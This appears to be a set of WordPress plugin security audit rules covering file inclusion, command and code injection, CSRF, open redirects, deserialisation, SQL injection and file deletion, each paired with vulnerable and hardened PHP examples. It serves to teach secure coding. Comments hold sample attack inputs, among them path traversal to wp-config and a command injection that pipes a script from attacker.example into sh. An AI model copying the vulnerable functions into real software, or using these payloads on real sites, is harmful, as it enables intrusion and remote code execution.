wp-file-inclusion-audit
These functions (the PHP include/require family) can lead to Local File Inclusion (LFI) or Remote File Inclusion (RFI) if the path passed to them is user-controlled. Validate the data properly before passing it to these functions: map the input onto an allowlist of known files, or resolve it and confirm it stays inside the intended directory.
Likelihood: LOW
Confidence: LOW
CWE:
- CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
- CWE-73: External Control of File Name or Path
- CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program (‘PHP Remote File Inclusion’)
OWASP:
- A01:2021 - Broken Access Control
- A08:2021 - Software and Data Integrity Failures
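An added example of the pattern the rule flags and one way to fix it (this is illustrative code, not part of the ruleset or of any real plugin; the templates directory, the template names and the `tpl` query parameter are assumed):

```php
<?php
// Added example, not from the ruleset. Template loading in a hypothetical plugin.

// Vulnerable: the template name comes straight from the request, so
// ?tpl=../../../../etc/passwd%00 or ?tpl=../../wp-config reaches include() (LFI),
// and with allow_url_include=On a http:// value becomes RFI.
function vuln_render_template() {
    $tpl = isset( $_GET['tpl'] ) ? $_GET['tpl'] : 'default';
    include plugin_dir_path( __FILE__ ) . 'templates/' . $tpl . '.php';
}

// Hardened: never build the include path from raw input. Map a short,
// sanitised key onto a fixed allowlist of files shipped with the plugin.
function safe_render_template() {
    $allowed = array(
        'default' => 'default.php',
        'grid'    => 'grid.php',
        'list'    => 'list.php',
    );

    // sanitize_key() reduces the value to [a-z0-9_-], so "../" cannot survive.
    $key = isset( $_GET['tpl'] ) ? sanitize_key( wp_unslash( $_GET['tpl'] ) ) : 'default';
    if ( ! isset( $allowed[ $key ] ) ) {
        $key = 'default';
    }

    $base = trailingslashit( plugin_dir_path( __FILE__ ) ) . 'templates/';
    $file = $base . $allowed[ $key ];

    // Belt and braces: even with an allowlist, confirm the resolved path is
    // still inside the templates directory before including it. realpath()
    // resolves symlinks and "..", and returns false for a missing file.
    $real_base = realpath( $base );
    $real      = realpath( $file );
    if ( false === $real || false === $real_base || 0 !== strpos( $real, $real_base . DIRECTORY_SEPARATOR ) ) {
        wp_die( 'Invalid template.', 400 );
    }
    include $real;
}
```

The allowlist is the actual fix; the realpath() check is a second line of defence so that a later edit which adds a user-derived segment to the path still cannot leave the directory.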
wp-command-execution-audit
These functions can lead to OS command execution if the data passed to them is user-controlled. Do not use the input directly: validate it against a strict pattern or allowlist, and quote every shell argument (escapeshellarg()) before passing it to these functions. Where possible, avoid the shell entirely and use a PHP library for the task.
Likelihood: LOW
Confidence: LOW
CWE:
- CWE-78: Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)
OWASP:
- A03:2021 - Injection
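An added example (not from the ruleset or any real plugin) of a request-controlled value reaching exec(), beside a hardened version. The `convert` binary, the uploads sub-directory and the `file` POST parameter are assumptions made for the illustration:

```php
<?php
// Added example, not from the ruleset. Thumbnail generation via an external tool.

// Vulnerable: the file name is concatenated into a shell command. A value such
// as "x.jpg; curl http://attacker.example/s | sh" runs attacker commands.
function vuln_convert_image() {
    $file = $_POST['file'];
    exec( 'convert ' . $file . ' -resize 800x600 ' . $file . '.thumb.jpg', $out, $rc );
    return 0 === $rc;
}

// Hardened: restrict the name to a strict pattern, resolve it inside a known
// directory, and quote every argument. escapeshellarg() wraps the value in
// single quotes so shell metacharacters (; | & ` $ etc.) lose their meaning.
// The regex also forbids a leading "-", so the value cannot be read as an option.
function safe_convert_image() {
    $name = isset( $_POST['file'] ) ? sanitize_file_name( wp_unslash( $_POST['file'] ) ) : '';
    if ( '' === $name || ! preg_match( '/^[A-Za-z0-9][A-Za-z0-9_-]*\.(jpe?g|png)$/', $name ) ) {
        return new WP_Error( 'bad_file', 'Invalid file name.' );
    }

    $upload = wp_upload_dir();
    $base   = realpath( trailingslashit( $upload['basedir'] ) . 'myplugin' ); // assumed directory
    $src    = $base ? realpath( $base . DIRECTORY_SEPARATOR . $name ) : false;
    if ( false === $src || 0 !== strpos( $src, $base . DIRECTORY_SEPARATOR ) ) {
        return new WP_Error( 'bad_path', 'File not found.' );
    }

    $cmd = sprintf(
        'convert %s -resize 800x600 %s',
        escapeshellarg( $src ),
        escapeshellarg( $src . '.thumb.jpg' )
    );
    exec( $cmd, $out, $rc );
    return 0 === $rc;
}
```

escapeshellcmd() is not a substitute: it escapes the command string as a whole and still allows the attacker to add extra arguments, which matters for tools (ImageMagick included) where arguments can name input and output files.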
wp-code-execution-audit
These functions (eval() and dynamic-callback constructs such as call_user_func() with a caller-supplied name) can lead to PHP code injection if the data passed to them is user-controlled. Do not use the input directly; dispatch through a fixed table of known callables or validate the data properly before passing it to these functions.
Likelihood: LOW
Confidence: LOW
CWE:
- CWE-94: Improper Control of Generation of Code (‘Code Injection’)
OWASP:
- A03:2021 - Injection
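An added example (illustrative, not from the ruleset or any real plugin) showing two shapes of the problem, a request-named callback and eval() of request text, with the fixes. The handler names `myplugin_count_posts` and `myplugin_list_tags` and the query parameters are assumed:

```php
<?php
// Added example, not from the ruleset.

// Vulnerable: the callable name comes from the request, so
// ?action=system&arg=id runs an OS command through call_user_func(),
// and eval() of request data is direct PHP code injection.
function vuln_dispatch() {
    return call_user_func( $_GET['action'], $_GET['arg'] );
}

function vuln_calc() {
    return eval( 'return ' . $_GET['expr'] . ';' );
}

// Hardened: dispatch through a fixed table. The request chooses a key, never
// a function name, so only the two handlers below are reachable.
function safe_dispatch() {
    $handlers = array(
        'count_posts' => 'myplugin_count_posts', // assumed plugin functions
        'list_tags'   => 'myplugin_list_tags',
    );
    $key = isset( $_GET['action'] ) ? sanitize_key( wp_unslash( $_GET['action'] ) ) : '';
    if ( ! isset( $handlers[ $key ] ) || ! is_callable( $handlers[ $key ] ) ) {
        return new WP_Error( 'bad_action', 'Unknown action.' );
    }
    $arg = isset( $_GET['arg'] ) ? sanitize_text_field( wp_unslash( $_GET['arg'] ) ) : '';
    return call_user_func( $handlers[ $key ], $arg );
}

// Hardened "calculator": parse the one grammar you actually need and reject
// everything else, so eval() is not used at all.
function safe_calc() {
    $expr = isset( $_GET['expr'] ) ? wp_unslash( $_GET['expr'] ) : '';
    if ( ! preg_match( '/^\s*(-?\d{1,9})\s*([+\-*])\s*(-?\d{1,9})\s*$/', $expr, $m ) ) {
        return new WP_Error( 'bad_expr', 'Invalid expression.' );
    }
    $a = (int) $m[1];
    $b = (int) $m[3];
    switch ( $m[2] ) {
        case '+':
            return $a + $b;
        case '-':
            return $a - $b;
        default:
            return $a * $b;
    }
}
```

The same reasoning applies to `$fn()` variable functions, `new $class`, array_map() with a request-supplied callback name, and create_function(): the name must come from code, not from the request.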
wp-file-download-audit
These functions can be used to read the contents of arbitrary files (for example wp-config.php) if the path passed to them is user-controlled. Do not use the input directly; validate the data properly, confine the resolved path to an expected directory, and check the caller's capability before passing it to these functions.
Likelihood: LOW
Confidence: LOW
CWE:
- CWE-73: External Control of File Name or Path
OWASP:
- A01:2021 - Broken Access Control
wp-ajax-no-auth-and-auth-hooks-audit
These hooks let a developer register custom AJAX endpoints. The "wp_ajax_{action}" hook fires for any authenticated user, regardless of role, and the "wp_ajax_nopriv_{action}" hook fires for unauthenticated visitors. Neither hook performs authorisation on its own: the handler must verify a nonce (check_ajax_referer()) and check the caller's capability (current_user_can()) for the specific action and object.
Likelihood: LOW
Confidence: LOW
CWE:
- CWE-285: Improper Authorization
OWASP:
- A01:2021 - Broken Access Control
wp-authorisation-checks-audit
wp-csrf-audit
Passing false or 0 as the third argument (the die flag) to this function, check_ajax_referer(), makes it return instead of stopping the request when the nonce is invalid. If the return value is then ignored, the request proceeds without a valid nonce and the check is useless. Either leave the third argument at its default (true) or act on the returned value.
Likelihood: LOW
Confidence: LOW
CWE:
- CWE-352: Cross-Site Request Forgery (CSRF)
OWASP:
- A05:2021 - Security Misconfiguration
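An added example covering the AJAX-hook, authorisation and CSRF rules together (illustrative code, not from the ruleset or any real plugin; the `myplugin_delete_item` action name, the `id` and `nonce` POST fields and the `myplugin_delete` nonce action are assumed). It shows the neutered check_ajax_referer() call beside a handler that enforces both the nonce and a capability check:

```php
<?php
// Added example, not from the ruleset.

// wp_ajax_{action} fires for any logged-in user; wp_ajax_nopriv_{action} fires
// for anonymous visitors. Registering both makes the handler reachable by anyone.
add_action( 'wp_ajax_myplugin_delete_item',        'myplugin_delete_item_vuln' );
add_action( 'wp_ajax_nopriv_myplugin_delete_item', 'myplugin_delete_item_vuln' );

// Vulnerable: reachable unauthenticated, no capability check, and the nonce
// check is neutered because the third argument is false and the return value
// is ignored, so a forged cross-site POST deletes any post by ID.
function myplugin_delete_item_vuln() {
    check_ajax_referer( 'myplugin_delete', 'nonce', false );
    $id = (int) $_POST['id'];
    wp_delete_post( $id, true );
    wp_send_json_success();
}

// Hardened: authenticated hook only, nonce result enforced, and a capability
// check on the specific object. A nonce proves intent, not permission, so
// both checks are needed.
add_action( 'wp_ajax_myplugin_delete_item_safe', 'myplugin_delete_item_safe' );

function myplugin_delete_item_safe() {
    // Either keep the default third argument so an invalid nonce dies with -1:
    //     check_ajax_referer( 'myplugin_delete', 'nonce' );
    // or pass false and act on the boolean it returns, as here.
    if ( false === check_ajax_referer( 'myplugin_delete', 'nonce', false ) ) {
        wp_send_json_error( 'Invalid nonce.', 403 );
    }

    $id = isset( $_POST['id'] ) ? absint( $_POST['id'] ) : 0;
    // Object-level authorisation: delete_post is a meta capability mapped to
    // the post's type and author, so a Contributor cannot delete others' posts.
    if ( ! $id || ! current_user_can( 'delete_post', $id ) ) {
        wp_send_json_error( 'Forbidden.', 403 );
    }

    if ( ! wp_delete_post( $id, true ) ) {
        wp_send_json_error( 'Delete failed.', 500 );
    }
    wp_send_json_success( array( 'deleted' => $id ) );
}

// The nonce the client side must send as the "nonce" field, bound to the
// same action string the handler verifies.
function myplugin_delete_nonce() {
    return wp_create_nonce( 'myplugin_delete' );
}
```

wp_send_json_error() and wp_send_json_success() terminate the request, which is why no return follows them. If an endpoint genuinely must be anonymous, register only the nopriv hook, still verify a nonce, and make sure the handler can only touch data an anonymous visitor is allowed to touch.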
wp-open-redirect-audit
This function (wp_redirect()) sends the browser to whatever URL it is given. If the URL comes from user input that is not sanitised or validated, this leads to an Open Redirect. Use wp_safe_redirect() instead, which restricts the target to the site's own host and the hosts returned by the "allowed_redirect_hosts" filter.
Likelihood: LOW
Confidence: LOW
CWE:
- CWE-601: URL Redirection to Untrusted Site (‘Open Redirect’)
OWASP:
- A05:2021 - Security Misconfiguration
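An added example (not from the ruleset) of the vulnerable and safe redirect, plus how to extend the allowlist when a second trusted host is required. The `next` query parameter and the host accounts.example.com are assumptions:

```php
<?php
// Added example, not from the ruleset.

// Vulnerable: wp_redirect() sends the browser wherever ?next= points, including
// https://attacker.example, so a link on the real site can be used for phishing.
function vuln_after_login_redirect() {
    $next = isset( $_GET['next'] ) ? $_GET['next'] : home_url();
    wp_redirect( $next );
    exit;
}

// Hardened: wp_safe_redirect() runs the target through wp_validate_redirect(),
// which allows only the site's own host (plus hosts added via the
// 'allowed_redirect_hosts' filter) and otherwise falls back to admin_url().
function safe_after_login_redirect() {
    $next = isset( $_GET['next'] ) ? esc_url_raw( wp_unslash( $_GET['next'] ) ) : home_url();
    wp_safe_redirect( $next );
    exit;
}

// If a second trusted host must be allowed, extend the allowlist rather than
// reverting to wp_redirect(). The hostname is assumed for illustration.
add_filter( 'allowed_redirect_hosts', function ( $hosts ) {
    $hosts[] = 'accounts.example.com';
    return $hosts;
} );

// Checking without redirecting, e.g. to show an error instead of a silent
// fallback: wp_validate_redirect() returns its second argument when the host
// is not allowed, so passing false yields false for an untrusted URL.
function is_trusted_redirect( $url ) {
    return false !== wp_validate_redirect( $url, false );
}
```

Note that protocol-relative values such as //attacker.example are handled by wp_validate_redirect(), which prefixes them with http: before checking the host; schemes other than http and https are rejected as well.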
wp-php-object-injection-audit
If the data passed to these functions (unserialize() and wrappers such as maybe_unserialize()) is user-supplied and used without proper validation, this leads to PHP Object Injection: the attacker chooses which class is instantiated and its magic methods (__wakeup(), __destruct(), __toString()) run with attacker-controlled properties. Do not use these functions on user-supplied input; use JSON functions instead.
Likelihood: LOW
Confidence: LOW
CWE:
- CWE-502: Deserialization of Untrusted Data
OWASP:
- A03:2021 - Injection
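An added example (illustrative, not from the ruleset or any real plugin) of a cookie deserialised with unserialize() beside a JSON-based replacement, and the PHP 7+ option for legacy serialized data. The `prefs` cookie and its fields are assumed:

```php
<?php
// Added example, not from the ruleset. User preferences stored in a cookie.

// Vulnerable: unserialize() of request data lets the attacker instantiate any
// loaded class with chosen property values, so a "gadget chain" of magic
// methods in WordPress core or any active plugin can be triggered.
function vuln_load_prefs() {
    $raw = isset( $_COOKIE['prefs'] ) ? $_COOKIE['prefs'] : '';
    return unserialize( base64_decode( $raw ) );
}
// maybe_unserialize() is the same sink: it calls unserialize() whenever the
// string looks serialized.

// Hardened: carry user state as JSON, which can only yield arrays and scalars,
// then validate the shape and range of each field before use.
function safe_load_prefs() {
    $raw  = isset( $_COOKIE['prefs'] ) ? wp_unslash( $_COOKIE['prefs'] ) : '';
    $data = json_decode( $raw, true );
    if ( ! is_array( $data ) ) {
        return array( 'per_page' => 20, 'theme' => 'light' );
    }
    return array(
        'per_page' => isset( $data['per_page'] ) ? min( 100, max( 1, (int) $data['per_page'] ) ) : 20,
        'theme'    => ( isset( $data['theme'] ) && in_array( $data['theme'], array( 'light', 'dark' ), true ) )
            ? $data['theme'] : 'light',
    );
}

function save_prefs( array $prefs ) {
    setcookie(
        'prefs',
        wp_json_encode( $prefs ),
        time() + DAY_IN_SECONDS,
        COOKIEPATH,
        COOKIE_DOMAIN,
        is_ssl(),
        true // HttpOnly
    );
}

// If legacy serialized data must still be read (from your own database rows,
// never from the request), forbid object creation: with
// 'allowed_classes' => false (PHP 7.0+) any object becomes
// __PHP_Incomplete_Class instead of being instantiated.
function load_legacy_setting( $serialized ) {
    return unserialize( $serialized, array( 'allowed_classes' => false ) );
}
```

The allowed_classes option only protects the call you add it to; data that WordPress itself unserializes (options, post meta) is still a sink if untrusted input can reach it, so the real fix is to keep serialized strings out of user-controlled channels altogether.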
wp-sql-injection-audit
Detected unsafe API usage. This can lead to SQL Injection if a variable interpolated into the query is user-controlled and not properly escaped or sanitised. To prevent SQL Injection, use safe API methods such as $wpdb->prepare() correctly (placeholders for every value, $wpdb->esc_like() for LIKE patterns, an allowlist for identifiers such as column names) or escape/sanitise the data properly.
Likelihood: LOW
Confidence: LOW
CWE:
- CWE-89: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)
OWASP:
- A03:2021 - Injection
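An added example (not from the ruleset) of string-built queries beside $wpdb->prepare() usage, including the two cases prepare() does not cover by itself: LIKE wildcards and identifiers. The functions and the columns they sort on are illustrative; the table is WordPress's own wp_posts:

```php
<?php
// Added example, not from the ruleset.

// Vulnerable: request data interpolated straight into the SQL string.
// $term = "%' OR 1=1 -- " returns every post, including drafts and private ones.
function vuln_search_posts( $term ) {
    global $wpdb;
    $sql = "SELECT ID, post_title FROM {$wpdb->posts}
            WHERE post_title LIKE '%{$term}%' AND post_status = 'publish'";
    return $wpdb->get_results( $sql );
}

// Hardened: bind every value with a placeholder. LIKE wildcards are not
// handled by prepare(), so escape them with $wpdb->esc_like() first;
// otherwise a term of "%" matches everything.
function safe_search_posts( $term, $per_page = 20 ) {
    global $wpdb;
    $like = '%' . $wpdb->esc_like( $term ) . '%';
    return $wpdb->get_results(
        $wpdb->prepare(
            "SELECT ID, post_title FROM {$wpdb->posts}
             WHERE post_title LIKE %s AND post_status = 'publish' LIMIT %d",
            $like,
            absint( $per_page )
        )
    );
}

// Identifiers (column names, sort direction) cannot be bound as values, so
// they must be chosen from an allowlist before being interpolated.
function safe_sorted_posts( $orderby, $order ) {
    global $wpdb;
    $columns = array( 'post_date', 'post_title', 'comment_count' );
    $orderby = in_array( $orderby, $columns, true ) ? $orderby : 'post_date';
    $order   = ( 'ASC' === strtoupper( (string) $order ) ) ? 'ASC' : 'DESC';
    return $wpdb->get_results(
        $wpdb->prepare(
            "SELECT ID, post_title FROM {$wpdb->posts}
             WHERE post_status = %s ORDER BY {$orderby} {$order} LIMIT %d",
            'publish',
            10
        )
    );
}
```

Two related mistakes the rule family also catches: calling $wpdb->prepare() with a query that contains no placeholders (the call does nothing useful and masks the problem), and passing a query that was already built from user input as the first argument. On WordPress 6.2 and later the %i placeholder can bind an identifier, which replaces the manual allowlist for column names.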
wp-file-manipulation-audit
These functions can be used to delete or overwrite arbitrary files (including wp-config.php or other plugins' code) if the path passed to them is user-controlled. Use them carefully: check the caller's capability, validate the file name, and confine the resolved path to the directory the feature is meant to manage.
Likelihood: LOW
Confidence: LOW
CWE:
- CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
- CWE-73: External Control of File Name or Path
- CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program (‘PHP Remote File Inclusion’)
OWASP:
- A01:2021 - Broken Access Control
- A08:2021 - Software and Data Integrity Failures
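An added example that serves both the wp-file-download-audit and wp-file-manipulation-audit rules, since both need the same path-containment check (illustrative code, not from the ruleset or any real plugin). The exports directory under wp-content/uploads, the helper name myplugin_resolve_in_dir(), the `file` request parameter, the nonce action and the capabilities used are assumptions:

```php
<?php
// Added example, not from the ruleset.

// Shared helper (hypothetical): resolve a request-supplied name to a real path
// and refuse anything that escapes $base_dir.
function myplugin_resolve_in_dir( $base_dir, $name ) {
    $base = realpath( $base_dir );
    // sanitize_file_name() strips slashes, null bytes and other special characters.
    $name = sanitize_file_name( wp_unslash( (string) $name ) );
    if ( false === $base || '' === $name ) {
        return false;
    }
    $real = realpath( $base . DIRECTORY_SEPARATOR . $name );
    // realpath() resolves symlinks and ".."; then require a prefix match on the
    // directory plus separator so "/srv/exports-evil" does not pass for "/srv/exports".
    if ( false === $real || 0 !== strpos( $real, $base . DIRECTORY_SEPARATOR ) ) {
        return false;
    }
    return $real;
}

// --- wp-file-download-audit ---
// Vulnerable: ?file=../../../wp-config.php is streamed back to the client.
function vuln_download() {
    $dir = wp_upload_dir();
    readfile( $dir['basedir'] . '/exports/' . $_GET['file'] );
    exit;
}

function safe_download() {
    if ( ! current_user_can( 'export' ) ) {
        wp_die( 'Forbidden', 403 );
    }
    $dir  = wp_upload_dir();
    $path = myplugin_resolve_in_dir( $dir['basedir'] . '/exports', isset( $_GET['file'] ) ? $_GET['file'] : '' );
    if ( false === $path || ! is_file( $path ) ) {
        wp_die( 'File not found', 404 );
    }
    header( 'Content-Type: application/octet-stream' );
    header( 'Content-Disposition: attachment; filename="' . basename( $path ) . '"' );
    header( 'Content-Length: ' . filesize( $path ) );
    readfile( $path );
    exit;
}

// --- wp-file-manipulation-audit ---
// Vulnerable: file=../../../wp-config.php deletes a file the site depends on.
function vuln_delete_export() {
    $dir = wp_upload_dir();
    unlink( $dir['basedir'] . '/exports/' . $_POST['file'] );
}

function safe_delete_export() {
    // Destructive action: capability check plus a nonce whose result is enforced.
    if ( ! current_user_can( 'manage_options' )
        || false === check_ajax_referer( 'myplugin_delete_export', 'nonce', false ) ) {
        wp_die( 'Forbidden', 403 );
    }
    $dir  = wp_upload_dir();
    $path = myplugin_resolve_in_dir( $dir['basedir'] . '/exports', isset( $_POST['file'] ) ? $_POST['file'] : '' );
    if ( false === $path || ! is_file( $path ) ) {
        return false;
    }
    return unlink( $path );
}
```

The same helper protects copy(), rename(), file_put_contents() and the WP_Filesystem equivalents: resolve first, compare against the real base directory, and only then touch the file. Checking the raw string for "../" is not enough, because encoded, doubled or symlinked variants bypass a substring test while realpath() does not.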